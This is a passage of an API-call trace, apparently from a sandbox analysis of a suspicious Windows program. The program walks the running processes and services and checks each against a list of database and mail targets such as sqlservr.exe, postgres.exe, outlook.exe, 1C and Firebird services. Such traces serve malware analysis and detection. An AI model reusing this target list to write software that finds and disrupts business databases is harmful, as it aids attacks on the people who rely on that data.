lpString2="csrss.exe") returned 1 [0270.205] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.205] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0270.206] lstrlenW (lpString="wininit.exe") returned 11 [0270.206] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0270.206] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0270.206] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0270.206] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0270.206] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0270.206] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0270.206] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0270.206] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0270.206] lstrlenW (lpString="csrss.exe") returned 9 [0270.206] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0270.206] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0270.206] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0270.206] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0270.206] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0270.206] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0270.206] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0270.206] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0270.207] lstrlenW (lpString="winlogon.exe") returned 12 [0270.207] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0270.207] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0270.207] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0270.207] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0270.207] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0270.207] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0270.207] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0270.207] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0270.207] lstrlenW (lpString="services.exe") returned 12 [0270.207] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0270.207] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0270.207] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0270.207] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0270.207] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0270.207] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0270.208] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0270.208] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0270.208] lstrlenW (lpString="lsass.exe") returned 9 [0270.208] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0270.208] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0270.208] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0270.208] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0270.208] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0270.208] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0270.208] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0270.208] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0270.208] lstrlenW (lpString="lsm.exe") returned 7 [0270.208] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0270.208] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0270.208] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0270.208] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0270.209] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0270.209] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0270.209] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0270.209] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.209] lstrlenW (lpString="svchost.exe") returned 11 [0270.209] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.209] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.209] lstrlenW (lpString="svchost.exe") returned 11 [0270.209] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.209] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.210] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.210] lstrlenW (lpString="svchost.exe") returned 11 [0270.210] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.210] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.210] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.211] lstrlenW (lpString="svchost.exe") returned 11 [0270.211] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0270.211] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.211] lstrlenW (lpString="svchost.exe") returned 11 [0270.211] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0270.211] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0270.211] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0270.212] lstrlenW (lpString="audiodg.exe") returned 11 [0270.212] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.212] lstrlenW (lpString="svchost.exe") returned 11 [0270.212] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0270.212] lstrlenW (lpString="userinit.exe") returned 12 [0270.212] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0270.213] lstrlenW (lpString="explorer.exe") returned 12 [0270.213] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0270.213] lstrlenW (lpString="dwm.exe") returned 7 [0270.213] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.213] lstrlenW (lpString="svchost.exe") returned 11 [0270.213] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0270.214] lstrlenW (lpString="agent1c.exe") returned 11 [0270.214] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0270.214] lstrlenW (lpString="spoolsv.exe") returned 11 [0270.214] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0270.215] lstrlenW (lpString="reader_sl.exe") returned 13 [0270.215] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0270.215] lstrlenW (lpString="dllhost.exe") returned 11 [0270.215] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0270.215] lstrlenW (lpString="taskhost.exe") returned 12 [0270.215] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0270.216] lstrlenW (lpString="svchost.exe") returned 11 [0270.216] Process32NextW (in: hSnapshot=0x398, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0270.216] CloseHandle (hObject=0x398) returned 1 [0270.216] Sleep (dwMilliseconds=0x1f4) [0271.019] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x42dc470 [0271.021] EnumServicesStatusExW (in: hSCManager=0x42dc470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 0 [0271.022] GetLastError () returned 0xea [0271.022] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xc9a) returned 0x4262fb8 [0271.022] EnumServicesStatusExW (in: hSCManager=0x42dc470, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4262fb8, cbBufSize=0xc9a, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4262fb8, pcbBytesNeeded=0x20eff44, lpServicesReturned=0x20eff5c, lpResumeHandle=0x0) returned 1 [0271.022] CloseServiceHandle (hSCObject=0x42dc470) returned 1 [0271.023] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0271.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0271.023] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0271.023] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0271.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0271.023] lstrlenW (lpString="AudioSrv") returned 8 [0271.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0271.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0271.023] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0271.023] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0271.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0271.023] lstrlenW (lpString="BFE") returned 3 [0271.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0271.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0271.023] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0271.023] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0271.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0271.023] lstrlenW (lpString="CryptSvc") returned 8 [0271.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0271.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0271.023] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0271.023] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0271.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0271.023] lstrlenW (lpString="CscService") returned 10 [0271.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0271.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0271.023] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0271.023] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0271.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0271.023] lstrlenW (lpString="DcomLaunch") returned 10 [0271.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0271.024] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0271.024] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0271.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0271.024] lstrlenW (lpString="Dhcp") returned 4 [0271.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0271.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0271.024] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0271.024] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0271.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0271.024] lstrlenW (lpString="Dnscache") returned 8 [0271.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0271.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0271.024] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0271.024] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0271.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0271.024] lstrlenW (lpString="DPS") returned 3 [0271.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0271.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0271.024] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0271.024] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0271.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0271.024] lstrlenW (lpString="eventlog") returned 8 [0271.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0271.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0271.024] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0271.024] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0271.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0271.024] lstrlenW (lpString="EventSystem") returned 11 [0271.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0271.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0271.024] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0271.025] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0271.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0271.025] lstrlenW (lpString="gpsvc") returned 5 [0271.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0271.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0271.025] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0271.025] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0271.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0271.025] lstrlenW (lpString="LanmanWorkstation") returned 17 [0271.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0271.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0271.025] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0271.025] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0271.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0271.025] lstrlenW (lpString="lmhosts") returned 7 [0271.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0271.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0271.025] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0271.025] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0271.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0271.026] lstrlenW (lpString="MMCSS") returned 5 [0271.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0271.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0271.026] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0271.026] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0271.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0271.026] lstrlenW (lpString="MpsSvc") returned 6 [0271.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0271.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0271.026] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0271.026] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0271.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0271.026] lstrlenW (lpString="NlaSvc") returned 6 [0271.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0271.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0271.026] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0271.026] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0271.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0271.026] lstrlenW (lpString="nsi") returned 3 [0271.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0271.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0271.026] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0271.026] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0271.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0271.026] lstrlenW (lpString="PcaSvc") returned 6 [0271.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0271.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0271.026] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0271.026] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0271.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0271.026] lstrlenW (lpString="PlugPlay") returned 8 [0271.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0271.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0271.026] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0271.027] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0271.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0271.027] lstrlenW (lpString="Power") returned 5 [0271.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0271.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0271.027] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0271.027] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0271.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0271.027] lstrlenW (lpString="ProfSvc") returned 7 [0271.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0271.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0271.027] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0271.027] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0271.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0271.027] lstrlenW (lpString="RpcEptMapper") returned 12 [0271.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0271.027] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0271.027] lstrcmpiW 